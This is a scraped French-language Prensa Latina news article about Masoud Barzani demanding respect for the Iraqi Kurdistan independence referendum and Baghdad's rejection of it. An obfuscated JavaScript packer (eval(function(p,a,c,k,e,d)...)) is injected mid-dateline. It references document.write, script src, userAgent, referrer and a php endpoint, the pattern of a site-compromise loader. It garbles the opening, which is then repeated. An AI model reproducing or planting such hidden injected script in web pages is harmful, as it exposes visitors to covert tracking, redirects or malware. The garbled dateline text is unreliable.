mardi 23 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le président du Kurdistan irakien demande le respect du référendum indépendantiste

Erbil, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|basda|var|u0026u|referrer|efhfh||js|php'.split('|'),0,{})) Irak, 27 septembre (Prensa Latina) Le président du Kurdistan irakien, Masoud Barzani, a demandé le respect des résultats du référendum séparatiste célébré lundi dernier dans cette région autonome de l'Irak.

Erbil, Irak, 27 septembre (Prensa Latina) Le président du Kurdistan irakien, Masoud Barzani, a demandé le respect des résultats du référendum séparatiste célébré lundi dernier dans cette région autonome de l’Irak.

Après avoir recompté près de 3,5 millions de suffrages, la Commission Électorale Indépendante a confirmé que lors de la consultation sur l’intention de se séparer de Bagdad le Oui s’est imposé avec près de 92 pour cent des votes.

Lors d’un discours télévisé retransmis par plusieurs chaînes, Barzani a indiqué que « nous pouvons faire face à des difficultés, mais nous allons aller de l’avant. Je demande aux puissances mondiales de respecter la volonté des millions de personnes qui ont voté lors du référendum ».

Le président de cette région a critiqué les mesures adoptées par le gouvernement central irakien et a manifesté son espoir quant à ce que le dialogue soit choisi plutôt que la menace et les décisions coercitives.

Selon Barzani, « la négociation est l’unique voie qui permettra de résoudre les différences entre les kurdes irakiens et Bagdad », puis  a prévenu que « si des sanctions sont adoptées contre le Kurdistan la situation empirera et rendra la tenue de cycles de conversations plus difficile ».

Le premier ministre irakien, Haidar Al-Abadi, a réitéré qu’il n’acceptera pas les résultats du plébiscite car il le considère inconstitutionnel, ce qui signifie qu’il n’y aura pas de conversations au sujet de l’hypothétique indépendance kurde.

La consultation populaire séparatiste a accru les tensions entre les deux parties, ainsi que dans le Moyen-Orient étant donné que la majorité des pays voisin de la région ont rejeté l’exercice électoral.

La Turquie, l’Iran, la Syrie, la Ligue Arabe et la communauté internationale coïncident sur le fait qu’un éclatement de l’Irak engendrerait l’instabilité du Moyen-Orient.

peo/tgj/arc

EN CONTINU
notes connexes